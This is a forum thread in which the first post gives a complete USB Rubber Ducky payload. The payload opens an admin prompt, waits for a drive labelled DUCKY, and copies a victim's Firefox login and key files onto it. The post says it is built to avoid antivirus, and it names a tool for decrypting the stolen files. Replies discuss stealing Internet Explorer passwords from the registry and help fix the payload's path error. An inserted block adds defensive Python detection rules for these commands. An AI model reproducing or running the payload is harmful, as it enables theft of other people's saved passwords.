shamwow Posted June 2, 2015 Share Posted June 2, 2015 (edited) This is for stealing firefox passwords using just Batch because it is not detected by AV. If someone could make Tutorial on how to make a Batch file to steal Internet Explorer passwords using only Batch or Powershell without triggering AV i would appreciate it. For this you need the Twin Duck firmware. You also need to label your ducky drive as the word "DUCKY". DEFAULT_DELAY 75 DELAY 3000 REM get a cmd prompt this way because it's admin: CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 REM the admin part. CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER REM Change directories because System32 appears to be protected. STRING CD %TEMP% ENTER REM Make batch file that waits for SD card to mount. REM Delete batch file if already exists STRING erase /Q DuckyWait.bat ENTER STRING copy con DuckyWait.bat ENTER REM DuckyWait.bat contents STRING :while1 ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d ENTER STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "ducky"') do set myd=%%d ENTER STRING if Exist %myd% ( ENTER STRING goto break ENTER STRING ) ENTER STRING timeout /t 30 ENTER STRING goto while1 ENTER STRING :break ENTER REM REM FINALLY COPY THE FIREFOX STUFF: STRING mkdir %myd%\firefox\ ENTER STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ ENTER STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\ ENTER STRING for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\ ENTER CONTROL z ENTER STRING DuckyWait.bat ENTER This is not needed but is the .bat file that the Duck creates in the Temp directory. 
:while1 for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d if Exist %myd% ( goto break ) timeout /t 30 goto while1 :break mkdir %myd%\firefox\ for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\key3.db %myd%\firefox\ for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\cert8.db %myd%\firefox\ To open and view the passwords just download Passwordfox.exe from the nirsoft site http://www.nirsoft.net/toolsdownload/passwordfox.zip Manually select the profile folder that just got created in the Duck inside the new Firefox directory. Edited July 22, 2015 by shamwow Quote Link to comment Share on other sites More sharing options...
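A defender's view of the payload in the post above, as an added example that is not part of the original thread: the batch file leaves three recognizable command lines in process-creation logs (the `wmic volume` label lookup, the `dir` listing of the Firefox profile root, and the `xcopy` of the credential files), and correlating them per host is more robust than matching any one alone. The event fields (`host`, `ts`, `cmdline`), the rule names and the sample events are assumptions constructed for illustration.

```python
import re

# Files the posted payload copies (logins.json, key3.db, cert8.db). key4.db and
# cert9.db are added here: they are the names current Firefox releases use.
CRED_FILES = ("logins.json", "key3.db", "cert8.db", "key4.db", "cert9.db")

RULES = {
    # wmic resolving a drive letter from a volume label
    "volume_label_lookup": re.compile(r"\bwmic(\.exe)?\b.*\bvolume\b.*\blabel\b", re.I),
    # directory listing under the Firefox profile root
    "profile_enumeration": re.compile(r"\bdir\b.*mozilla\\firefox\\profiles", re.I),
    # copy utility reading one of the credential-store files
    "cred_file_copy": re.compile(
        r"\b(xcopy|robocopy|copy)(\.exe)?\b.*\\("
        + "|".join(map(re.escape, CRED_FILES)) + r")(?![\w.])", re.I),
}

# Constructed process-creation events (ts in seconds); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS-017", "ts": 0, "cmdline": r"wmic volume get driveletter, label"},
    {"host": "WS-017", "ts": 40, "cmdline": r'cmd.exe /c dir /b /s /a:d "C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"'},
    {"host": "WS-017", "ts": 41, "cmdline": r"xcopy C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\ab12cd34.default\logins.json E:\firefox"},
    {"host": "WS-017", "ts": 50, "cmdline": r"xcopy C:\build\out D:\backup /s"},   # benign copy
    {"host": "WS-022", "ts": 10, "cmdline": r"wmic volume get driveletter, label"},  # lone inventory query
]

def matched_rules(cmdline):
    """Names of all rules whose pattern matches one command line."""
    return {name for name, rx in RULES.items() if rx.search(cmdline)}

def correlate(events, window=600):
    """Alert per host when a credential-file copy is seen together with another
    stage of the chain in the preceding `window` seconds."""
    hits = [(ev, name) for ev in events for name in matched_rules(ev["cmdline"])]
    alerts = {}
    for ev, name in hits:
        if name != "cred_file_copy":
            continue
        related = {n for e, n in hits
                   if e["host"] == ev["host"] and 0 <= ev["ts"] - e["ts"] <= window}
        if len(related) >= 2:
            alerts.setdefault(ev["host"], set()).update(related)
    return {host: sorted(names) for host, names in alerts.items()}

if __name__ == "__main__":
    print(correlate(SAMPLE_EVENTS))
```

The default window is wide because the batch file polls for the drive every 30 seconds, so the label lookup can precede the copy by several minutes.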
overwraith Posted June 20, 2015
This looks really good, good job. I did some superficial research on IE, and it appears that it stores the passwords in the registry. Could be a little more involved to extract such information, and hopefully the pass recovery tools would be able to accept the extracted data. You may have to read the values back into the registry on another computer in order to extract the passwords with a password tool. It should be possible to save as .reg files elsewhere. I am not a registry savant. I don't know though. I was looking at this site: http://www.majorgeeks.com/content/page/how_to_manage_your_internet_explorer_saved_passwords.html I think my Win 7 registry is set up a little bit different however, so you would need different payloads for XP, Win 7, and Win 8, or some sort of if statement within the script in order to perform the right operations.
shamwow Posted July 4, 2015 (Edited July 22, 2015 by shamwow)
> This looks really good, good job. I did some superficial research on IE, and it appears that it stores the passwords in the registry. Could be a little more involved to extract such information, and hopefully the pass recovery tools would be able to accept the extracted data. You may have to read the values back into the registry on another computer in order to extract the passwords with a password tool. It should be possible to save as .reg files elsewhere. I am not a registry savant. I don't know though. I was looking at this site: http://www.majorgeeks.com/content/page/how_to_manage_your_internet_explorer_saved_passwords.html I think my Win 7 registry is set up a little bit different however, so you would need different payloads for XP, Win 7, and Win 8, or some sort of if statement within the script in order to perform the right operations.

In Windows 7, I can get Internet Explorer 7, 8, 9 and 10 passwords.
MikeVazovsky Posted July 15, 2015
Do you know what algorithm can decipher the passwords? I want to write your own C# program.
overwraith Posted July 15, 2015 (Edited July 15, 2015 by overwraith)
The only "algorithm" that can crack passwords is called a "brute force". If you want to do it in C# you will have to learn about the crypto API (is not as scary as it sounds, buy a data security book for C#, the most current one, will be a little bit old), and you will also have to learn how brute force algorithms work. Think like the odometer in your car. I tried a while back, I am thinking one would get better performance out of a C++ program however. You see, encryption of passwords is made via a one way hash, so there is no reversing it unless you have some Q-bits (like that will ever happen...). Brute force is guessing all possible outcomes. Although you could also do a wordlist crack, is essentially the same thing, except slightly more efficient. Learn this from my trials, threads are very inefficient to load up, so they can slow things down.
MikeVazovsky Posted July 15, 2015
Oh, no, you got me wrong, I want to learn how to decipher the algorithm password if I know: logins.json, key3.db and cert8.db (as well as it does PasswordFox).
overwraith Posted July 15, 2015
So it is more of a formatting thing than an actual cracking program? I don't know, somebody else might know.
MikeVazovsky Posted July 16, 2015
I have a problem: the path %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\ opens well, but for the path %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default it wrote that it could not find it, even though I have a folder gofsocms.default. How to solve it?
shamwow Posted July 22, 2015 Author Share Posted July 22, 2015 (edited) I have a problem the %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\ opens well, but the way %userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default wrote that he could not find, even though I have a folder gofsocms.default. How to solve it? for /f %%G in ('dir /b /s /a:d "%userprofile%\AppData\Roaming\Mozilla\Firefox\Profiles\*.default"') do xcopy %%G\logins.json %myd%\firefox\ is a batch script command. you need to include the whole line. also, first label your duck drive to the word "ducky" for the payload to work. Edited July 22, 2015 by shamwow Quote Link to comment Share on other sites More sharing options...